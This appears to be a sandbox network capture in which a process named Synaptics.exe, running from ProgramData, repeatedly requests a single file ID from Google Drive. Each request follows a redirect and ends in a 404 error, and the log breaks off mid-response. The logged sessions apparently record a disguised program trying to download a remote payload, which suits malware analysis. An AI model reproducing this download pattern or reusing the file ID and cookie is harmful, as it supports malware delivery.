2024-12-30 10:49:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:23 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-n3xUfW2FXnnH0kFdti6uMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            47 | 192.168.2.8 | 49800 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:24 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-CEBxg_oy6sq7jkK4dJrBHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            48 | 192.168.2.8 | 49798 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:24 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:24 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7ZUhcsjEytEFHWrG3I0SdpxD0KO-40Cc7SRMLcpzLGzODKCS7p60GbJfckwSAlpWANXNoXtRc
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-lGIG7fO2dqmaWCC0lF13cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:24 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:24 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="ukQ26q_YaHJGbTFgAXFuPg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:24 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            49 | 192.168.2.8 | 49799 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:24 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-dZFH7y1nSaA1hyR7qGc77Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            50 | 192.168.2.8 | 49797 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:24 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4WM7Hae0nWn28ohK6_l7PPfgLiFuBp4fLO4YgQgLCx5gO2D20h4C-0BfvLOWKRnyDi
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-XXLu693lqBJwszJBuR606w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="t6qKo7J7vyfB3HG2cI0htQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            51 | 192.168.2.8 | 49804 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC42U7NeHeFEeUozfXoOpuK3ch8O996UDbnt9ABbknjUy-Xwup_fDByBMzqBaIUi57xeE6MZv-0
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:25 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-vu6-CYJq0P4K0K2zFZJ82w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="4p9AZpzKg_mdaurXZfnDzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            52 | 192.168.2.8 | 49802 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:25 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-s-QOrc8ulC_Ootpwf8qulQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            53 | 192.168.2.8 | 49803 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:25 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-UM9OOvqi1hVir8aE4kiqew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            54 | 192.168.2.8 | 49805 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:25 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:26 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7NKr3rOUZ5PV0WHzbq-Yjpg8ODmdzf2lAMcwsqR8jHZEC81RsYuccd4olCf1fERXjy
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:25 GMT
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-tCMGV9BrQYBhoDwkSkef2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:26 UTC | 147 | IN
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:26 UTC | 1390 | IN
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="K0wnGZUds0bvjzQLD8tXEA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:26 UTC | 115 | IN
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.8 | 49807 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:26 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:26 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC52p6EgAv7eVuWBDy83xgMIMCWNQTEvA4Rt6o4of_Iaa_wWXy-ItXi0o1016LrCR2Dl
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
